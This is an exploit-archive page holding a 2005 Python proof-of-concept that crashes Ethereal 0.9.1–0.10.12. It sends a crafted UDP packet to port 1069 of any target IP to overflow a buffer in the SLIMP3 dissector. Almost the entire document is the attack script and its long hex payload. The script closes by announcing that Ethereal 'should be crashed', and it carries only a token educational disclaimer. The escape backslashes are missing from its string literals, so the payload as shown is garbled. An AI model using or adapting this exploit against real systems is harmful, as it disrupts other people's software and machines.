Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Ethereal 0.9.1 - 0.10.12 SLIMP3 Remote Buffer Overflow PoC
# Published : 2005-10-20
# Author : Sowhat
# Previous Title : MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047)
# Next Title : Lynx <= 2.8.6dev.13 Remote Buffer Overflow Exploit (PoC)
# ethereal_slimp3_bof.py
# Ethereal SLIMP3 Remote Buffer Overflow PoC
# Bug Discoverd by Vendor(?)   2005-10-19
# Coded by Sowhat
# http://secway.org
# 2005-10-20
# This PoC will crash the Ethereal
# Tested with Ethereal 0.10.12, WinPcap 3.1 beta4, WinXP SP2
# For educational purpose only, Use at your own risk!

# Version 0.9.1 to 0.10.12
# http://www.ethereal.com/docs/release-notes/ethereal-0.10.13.html
# "The SLIMP3 dissector could overflow a buffer. "
 
import sys
import string
import socket

if (len(sys.argv) != 2):
	print " ##################################################################"
	print " #                                                                #"
	print " #       Ethereal SLIMP3 Remote Buffer Overflow PoC               #"
	print " #                  Coded  by Sowhat                              #"
	print " #                 http://secway.org                              #"
	print " ##################################################################"
	print "n Usage: " + sys.argv[0] + " TargetIP"
	print " TargetIP should be any IP address Ethereal can reach"
	sys.exit(0)

host = sys.argv[1]
port = 1069

victim = (host, port)

request  = "x6CxC3xB2xA1x02x00x04x00x00x00x00x00x00x00x00x00"
request += "xFFxFFx00x00x01x00x00x00x56x57xF7x42x5Bx6Ax04x00"
request += "x58x01x00x00x58x01x00x00x00x04x20x04x19xA2x00x0C"
request += "x6ExE3xB7xC7x08x00x45x00x01x4AxB4x6Cx40x00x40x11"
request += "x03x79xC0xA8x00x0AxC0xA8x00x63x0Dx9Bx0Dx9Bx01x36"
request += "x83x05x6Cx20x20x20x20x20x20x20x20x20x20x20x20x20"
request += "x20x20x20x20x02x33x02x00x02x30x03x03x02x40x03x10"
request += "x03x10x03x10x03x10x03x10x03x10x03x10x03x00x02x58"
request += "x03x10x03x10x03x08x03x04x03x02x03x01x03x01x03x00"
request += "x02x60x03x7Fx03x00x03x00x03x00x03x00x03x00x03x00"
request += "x03x00x02x68x03x01x03x01x03x01x03x01x03x01x03x01"
request += "x03x01x03x00x02x50x03x01x03x01x03x02x03x04x03x08"
request += "x03x10x03x10x03x00x02x48x03x01x03x02x03x04x03x08"
request += "x03x10x03x10x03x1Fx03x00x02x06x02x02x02x0Cx03x20"
request += "x03x20x03x20x03x20x03x20x03x20x03x20x03x20x03x20"
request += "x03x20x03x20x03x02x03x00x03x05x03x5Fx03x00x03x2E"
request += "x03x02x03x04x03x03x03x02x03x04x03x03x03x2Ex03x02"
request += "x03x04x03x03x03x20x03x01x03x20x03x20x03x20x03x20"
request += "x03x20x03x20x03x20x03x20x03x20x03x20x03x20x02xC0"
request += "x03x20x03x20x03x20x03x20x03x20x03x20x03x20x03x20"
request += "x03x20x03x20x03x20x03x20x03x00x03x20x03x20x03x00"
request += "x03x2Ex03x03x03x5Fx03x02x03x03x03x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03"
request += "x04x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04"
request += "x01x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01"
request += "x01x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01"
request += "x02x03x04x01x01x02x03x04x01x01x02x03x04x01x01x02"
request += "x03x04x01x5F"

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.sendto(request, victim)
print " Ethereal should be crashed ! ;)"

# www.Syue.com [2005-10-20]